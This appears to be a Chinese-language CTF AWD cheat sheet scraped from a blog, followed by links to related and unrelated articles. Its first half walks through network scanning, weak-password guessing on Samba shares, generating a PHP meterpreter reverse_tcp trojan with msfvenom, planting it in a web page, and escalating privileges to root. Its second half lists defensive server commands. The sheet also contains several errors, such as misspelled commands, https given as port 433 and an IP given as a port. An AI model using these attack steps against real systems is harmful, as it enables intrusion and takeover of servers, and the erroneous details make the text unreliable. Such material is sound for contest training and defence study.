扫描对方IP:
ifconfig (先获取自己的IP)
netdiscover -r 192.168.0.1/24   (扫描1~124的IP)

获取IP后:
nmap -sV 192.168.0.104 (端口扫描)
nmap -A -v -T4 192.168.0.104 (TCP 端口扫描)

端口:
    22: ssh
    21: ftp
    23: telnet
    80: http
    433:https
    3306: mysql
若有Samba服务开起:
smbclinet -L 192.168.0.104 (查看目录)

smbclinet '\\192.168.0.104\print$' (进入目录print$)
(一个一个的试)(弱密码猜测)
若进入后:
get a.txt  (可以获取a.txt文件)

mysql -h 192.168.0.104 -u Admin  -p (连接数据库)
(输入密码)  (密码可能藏在某个文件)

searchsploit Samba smbd 3.x - 4.x (搜索)

dirb http://192.168.0.104 (扫描web)

进入网站
登录Admin
使用msf来设置payload
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options (查看)
set lhost (ip)
set lport (ip)
run (监听)

msfvenom -p php/meterpreter/reverse_tcp lhost=(ip) lport=(ip) -f raw
(生成php shell 木马)

将木马复制粘贴到某一个php页面,然后想方设法触发漏洞,通过访问该php,即可触发漏洞

触发成功后:
msf里shell

提权:
id (查看当前的用户uid)
python -c "import pty;pty.spawn('/bin/bash')"
cat /etc/passwd (获取用户)
su (用户) (有密码自己找)
sudo -l 提权
sudo su
进入查找flag,一般在 /root/proot.txt
cat proot.txt
提交flag!

ssh操作

ssh <-p 端口> 用户名@IP  //登录
scp 文件路径  用户名@IP:存放路径  //向ssh服务器上传输文件

备份web目录
  tar -zcvf web.tar.gz /var/www/html/
用户管理
  w   //查看当前用户
  pkill -kill -t <用户tty>   //踢掉当前登录用户

进程管理

  ps aux | grep pid或者进程名  //查看进程信息

  查看已建立的网络连接及进程
  netstat -antulp | grep EST

  查看指定端口被哪个进程占用
  lsof -i:端口号 或者 netstat -tunlp|grep 端口号

  结束进程命令
  kill PID
  killall <进程名>
  kill -9 <PID>

iptables命令

  封杀某个IP或者ip段,如:123.4.5.6
  iptables -I INPUT -s 123.4.5.6 -j DROP
  iptables -I INPUT -s 123.4.5.1/24 -j DROP

  禁止从某个主机ssh远程访问登陆到本机,如123.4.5.6
  iptable -t filter -A INPUT -s 123.4.5.6 -p tcp --dport 22 -j DROP

Mysql数据库操作

  备份mysql数据库
  mysqldump -u 用户名 -p 密码 数据库名 > back.sql  //备份指定数据库
  mysqldump --all-databases > bak.sql    //备份所有数据库

  还原mysql数据库
  mysql -u 用户名 -p 密码 数据库名 < bak.sql

安全检查

  find / *.php -perm 4777    //查找777的权限的php文件
  awk -F: '{if($3==0)print $1}' /etc/passwd  //查看root权限的账号
  crontab -l  //查看计划任务

  检测所有的tcp连接数量及状态
  netstat -ant|awk '{print $5 "\t" $6}' |grep "[1-9][0-9]*\."|sed -e 's/::ffff://' -e 's/:[0-9]*//'|sort|uniq -c|sort -rn

  查看页面访问排名前十的IP
  cat /var/log/apache2/access.log | cut -f1 -d " " | sort | uniq -c | sort -k 1 -r | head -10

  查看页面访问排名前十的URL
  cat /var/log/apache2/access.log | cut -f4 -d " " | sort | uniq -c | sort -k 1 -r | head -10  

搜寻网站简要信息
  curl --head 网站
  xprobe2 -v 网站
  nmap []
  -A显示详细版本信息
  -v显示详细信息
  -o显示对方操作系统

matego

Web漏洞发现(http扫描)
 webshag
  w3af---(强大专业工具)
  owasp ZAP等同于w3af WEB扫描工具

注入工具
  Sqlmap
  setoolkit(*****很牛工具)

AWD的更多相关文章

  1. CTF线下赛AWD套路小结

    近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了. 一. AWD模式简介 AWD:Attack With Defence,比赛中每个队伍维护多台服务 ...

  2. 某线下赛AWD

    拿别人比赛的来玩一下,或许这就是菜的力量吧. 0x01 任意文件读取: switch ($row['media_type']) { case 0: // 图片广告 ...... break; case ...

  3. CTF AWD模式攻防Note

    ###0x01 AWD模式 Attack With Defence,简而言之就是你既是一个hacker,又是一个manager.比赛形式:一般就是一个ssh对应一个web服务,然后flag五分钟一轮, ...

  4. CTF线下赛AWD模式下的生存技巧

    作者:Veneno@Nu1L 稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 原文:https://www.anquanke.com/post/id/8467 ...

  5. 代码审计-四叶草杯线下awd比赛源码web2

    今晚简单来看看那天比赛的源码吧,比赛的时候还是有些慌没有好好去静下心看代码. awd给的题中的漏洞,都是那种可以快速让你利用拿到权限后得到flag的那种,特别复杂利用的一般没有. 建议先黑盒去尝试,例 ...

  6. 关于参加AWD攻防比赛心得体会

    今天只是简单写下心得和体会 平时工作很忙 留给学习的时间更加珍少宝贵. 重点说下第二天的攻防比赛吧  . 三波web题 .涉及jsp,php,py. 前期我们打的很猛.第一波jsp的题看到有首页预留后 ...

  7. AWD攻防工具脚本汇总(一)

    最近工作很忙 今天抽空准备下AWD比赛得攻防工具和脚本 以下只是常用 希望下周不被吊锤~~ 后续整理后想抽空写成一个攻击框架汇总放github~~ 这里从各种情景和需求中去总结工具和脚本的使用   情 ...

  8. Ubunut18 安装docker环境&&AWD攻防平台部署

    docker:有两个版本:docker-ce(社区版)和docker-ee(企业版). 参考官网地址:https://docs.docker.com/engine/installation/linux ...

  9. 线下AWD平台搭建以及一些相关问题解决

    线下AWD平台搭建以及一些相关问题解决 一.前言 文章首发于tools,因为发现了一些新问题但是没法改,所以在博客进行补充. 因为很多人可能没有机会参加线下的AWD比赛,导致缺乏这方面经验,比如我参加 ...

  10. AWD模式搅屎模式

    AWD模式搅屎模式 ###0x01 出题思路 ####1:题目类型 1-出题人自己写的cms,为了恶心然后加个so. 2-常见或者不常见的cms. 3-一些框架漏洞,比如ph师傅挖的CI这种 #### ...

随机推荐

  1. React-Native 之 GD (十九)TabBarItem 逻辑完善 / 关闭筛选菜单滑动手势 / Navigator 掉帧卡顿问题处理

    1.TabBarItem 逻辑完善 那么为了更好的用户体验,我们这边还需要来处理一下点击 TabBarItem 的一下细节,那就是当用户点击 Item 时,可能只是单纯的想进行页面的 切换或者置顶操作 ...

  2. nginx 和 php

    sudo apt-get install nginx sudo groupadd www sudo useradd -g www www /etc/nginx/nginx.conf service n ...

  3. xfs格式化、ext4格式化并指定inode区别

    [root@b ~]# mkfs.ext4 -N 90000000 /dev/sdb3 首先是mkfs.xfs的,重点是这几个:     -i size=512  : 默认的值是256KB,这里的设置 ...

  4. ora600

    4节点RAC:版本oracle11.2.0.4 22:20——23:40发生ora600 alert日志: Errors in file /u01/app/oracle/diag/rdbms/orcl ...

  5. 一个DRF框架的小案例

    第一步:安装DRF DRF需要以下依赖: Python (2.7, 3.2, 3.3, 3.4, 3.5, 3.6) Django (1.10, 1.11, 2.0) DRF是以Django扩展应用的 ...

  6. 阶段1 语言基础+高级_1-3-Java语言高级_04-集合_04 数据结构_4_数据结构_链表

    查询慢,增删快. 绿色代表一条链 红色是另外一条链 .查询是从头开始查所以慢. 在300和55之间添加一个元素

  7. Centos7最小安装化后安装图形界面

    首先需要对系统进行更新 yum -y upgrade 然后安装桌面组件包 ,在命令行下输入下面的命令来安装 Gnome 包 yum groupinstall "GNOME Desktop&q ...

  8. beego 注解路由无效问题分析

    问题描述:学习 beego 框架发现注解路由无效,除了不能找到路由外,未见任何异常. 问题解决:将配置文件中的 runmode 更改为 dev 模式. 问题分析: 如果没有设置过 runmode 不会 ...

  9. G2 基本使用 折线图 柱状图 饼图 基本配置

    G2的基本使用 1.浏览器引入  <!-- 引入在线资源 --> <script src="https://gw.alipayobjects.com/os/lib/antv ...

  10. 【BASIS系列】SAP 中查看account登陆次数及时间的情况

    公众号:SAP Technical 本文作者:matinal 原文出处:http://www.cnblogs.com/SAPmatinal/ 原文链接:[BASIS系列]SAP 中查看account登 ...